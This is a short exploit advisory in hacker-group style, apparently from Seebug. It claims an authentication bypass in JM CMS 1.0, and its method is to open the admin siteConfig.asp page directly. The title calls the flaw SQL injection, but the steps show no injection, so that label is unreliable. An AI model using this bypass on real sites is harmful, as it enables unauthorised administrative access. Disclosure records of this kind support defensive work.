_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___ /_/Rd_ _ / _ _\/ _ _ / \ \< |/_ _ / /\ | \ /\ || \( ) /\ | \ (| | \_ _ _ _/ /_ _ / / __ | () / | | / / [d0t]com/@~\ | (O) / /+~\ ||_O_|( ) /0O\ | \ | | _ _ _ _\ \_ _ \ \ _ _ _ | \ | | / /_ _ /|__|\ | \ /|__|\|| O |( ) /+__+\| ^ \ | | /_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\__\ |__|/_ _ _ _ _\ /\| |/\|__|\__\( ) ( )|___/(_)/\| |/\__\__\|_ > ============================================================================== [?] ~ Note : Hacker R0x Lamerz Sux ! ============================================================================== [?] JM CMS 1.0 <== 1.0 (Auth Bypass) SQL Injection Vulnerability ============================================================================== [?] my home: [ http://sec-r1z.com ] [?] Script: [ JM CMS 1.0 ] [?] Language: [ ASP ] [?] Vendor [http://designsbyjm.net ] [?] Founder: [ ./Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - my love :$ ] ######################################################################## ===[ Exploit SQL Bypass ]=== [»] Go to : [Path]/admin [»] Add : siteConfig.asp [»] dem0 : http://server/admin/siteConfig.asp
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论